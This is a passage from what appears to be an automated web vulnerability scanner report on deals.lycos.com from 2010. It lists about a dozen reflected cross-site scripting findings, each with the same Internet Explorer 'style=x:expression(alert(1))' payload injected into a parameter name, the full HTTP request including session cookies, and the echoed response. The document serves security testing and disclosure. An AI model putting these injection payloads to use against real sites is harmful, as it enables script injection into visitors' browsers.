Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2c906"style="x:expression(alert(1))"2a42ce649cd=1">
...[SNIP]...

3.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6c7a"style="x:expression(alert(1))"5a17236f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/computer-39?e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e6c7a"style="x:expression(alert(1))"5a17236f13a=1">
...[SNIP]...

3.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688cc"style="x:expression(alert(1))"fbe0d430e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/digital-cameras-168?688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;688cc"style="x:expression(alert(1))"fbe0d430e89=1">
...[SNIP]...

3.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as daf23"style="x:expression(alert(1))"a3aefb6c21b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/electronics-142?daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;daf23"style="x:expression(alert(1))"a3aefb6c21b=1">
...[SNIP]...

3.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e037e"style="x:expression(alert(1))"f64d12d06a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/gaming-and-toys-186?e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e037e"style="x:expression(alert(1))"f64d12d06a2=1">
...[SNIP]...

3.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b70e3"style="x:expression(alert(1))"c8c79da67d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/health-and-beauty-228?b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b70e3"style="x:expression(alert(1))"c8c79da67d5=1">
...[SNIP]...

3.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b6e"style%3d"x%3aexpression(alert(1))"da228453765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15b6e"style="x:expression(alert(1))"da228453765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/home-and-garden-196?15b6e"style%3d"x%3aexpression(alert(1))"da228453765=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;15b6e"style="x:expression(alert(1))"da228453765=1">
...[SNIP]...

3.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44fe"style="x:expression(alert(1))"9561e55b253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/lcd-tvs-424?c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;c44fe"style="x:expression(alert(1))"9561e55b253=1">
...[SNIP]...

3.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0cfa"style="x:expression(alert(1))"f4ca06b8abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/movies-music-books-178?b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b0cfa"style="x:expression(alert(1))"f4ca06b8abd=1">
...[SNIP]...

3.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d05"style="x:expression(alert(1))"683cdf99577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/mp3-players-144?e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e7d05"style="x:expression(alert(1))"683cdf99577=1">
...[SNIP]...

3.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80659"style%3d"x%3aexpression(alert(1))"5affdd2a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80659"style="x:expression(alert(1))"5affdd2a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/office-and-supplies-182?80659"style%3d"x%3aexpression(alert(1))"5affdd2a85=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;80659"style="x:expression(alert(1))"5affdd2a85=1">
...[SNIP]...

3.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99553"style="x:expression(alert(1))"74c4b97e54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/pc-computers-47?99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;99553"style="x:expression(alert(1))"74c4b97e54d=1">
...[SNIP]...

3.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1636"style%3d"x%3aexpression(alert(1))"804d8716915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1636"style="x:expression(alert(1))"804d8716915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/sports-and-fitness-211?b1636"style%3d"x%3aexpression(alert(1))"804d8716915=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
